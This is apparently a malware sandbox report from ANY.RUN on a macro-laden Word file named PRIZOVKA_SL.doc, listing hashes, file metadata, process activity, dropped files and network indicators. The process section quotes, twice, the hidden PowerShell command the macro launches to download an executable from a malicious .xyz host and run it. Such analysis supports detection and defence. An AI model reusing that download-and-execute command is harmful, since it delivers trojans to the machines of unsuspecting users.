analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PRIZOVKA_SL.doc

Full analysis: https://app.any.run/tasks/92bd929b-98ee-4f92-8fed-c6ab305e8e6b
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: July 13, 2020, 06:04:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

EFBBCB22ADA2F020C3B42AB493319219

SHA1:

BA020E6F2DE3FC7C2157A97A48F5D8F1DD265A05

SHA256:

862AE4965D444177054003D219E02020352F69BA3CD7DB0FD807280DD2718A06

SSDEEP:

1536:QT1Kq9jcOj3CTqnrc7OfbWY7/8Qwb56RHYS9c32mWi6a9g:0Uc/3KueQKY7/8ErcYi6aG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 1328)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1328)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2760)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3864)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1328)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1328)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XMP

Description: -
Creator: vps
Subject: -
Title: -

XML

ModifyDate: 2020:07:09 01:58:00Z
CreateDate: 2020:07:09 01:57:00Z
RevisionNumber: 2
LastModifiedBy: vps
Keywords: -
AppVersion: 14
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 1
LinksUpToDate: No
Company: -
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 1
Words: -
Pages: 1
TotalEditTime: -
Template: Normal.dotm

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1615
ZipCompressedSize: 437
ZipCRC: 0x16e97fa5
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1328"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PRIZOVKA_SL.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2760"C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://fgs.elpadrino.xyz:2095/lado/1.exe',$env:Temp+'\esd.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\esd.exe')C:\Windows\System32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3864powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://fgs.elpadrino.xyz:2095/lado/1.exe',$env:Temp+'\esd.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\esd.exe')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 091
Read events
1 280
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
1328WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB5A6.tmp.cvr
MD5:
SHA256:
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YJQUGE82K9BQHEN35DB7.temp
MD5:
SHA256:
1328WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\MSO2057.aclbinary
MD5:FA553F58C44654E95FF137BF2AE42884
SHA256:F13095BACB43E49D1004E44B7F51EE4685AFC77B869BBD15E77FBC2BE9FE6301
1328WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:6DFB6FA4B21ACBCBB6AF6691D8508B66
SHA256:FE73574B26931FA460FA9F301EAA4650EFA86C20B774B6D613DA5033D1640C27
1328WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$IZOVKA_SL.docpgc
MD5:7733D7A7DC876CDD9533A6AD81D2423D
SHA256:3F1295E10EC9D7EA74D4F3DC04B3975EE5BC313C6704FFB2753D469393FB0B53
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:D7375982BC5CAA193E7D0097FEE9DE22
SHA256:07CD2F1DC0376C91EF989A7617E88688C8E84C1507F28FFB25E02482AE02F18A
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10c17d.TMPbinary
MD5:D7375982BC5CAA193E7D0097FEE9DE22
SHA256:07CD2F1DC0376C91EF989A7617E88688C8E84C1507F28FFB25E02482AE02F18A
1328WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0809.lextext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3864
powershell.exe
GET
403
104.18.49.250:2095
http://fgs.elpadrino.xyz:2095/lado/1.exe
US
text
16 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3864
powershell.exe
104.18.49.250:2095
fgs.elpadrino.xyz
Cloudflare Inc
US
malicious

DNS requests

Domain
IP
Reputation
fgs.elpadrino.xyz
  • 104.18.49.250
  • 172.67.158.147
  • 104.18.48.250
malicious

Threats

PID
Process
Class
Message
3864
powershell.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
3864
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016
3864
powershell.exe
Potentially Bad Traffic
AV INFO HTTP Request to a *.xyz domain
No debug info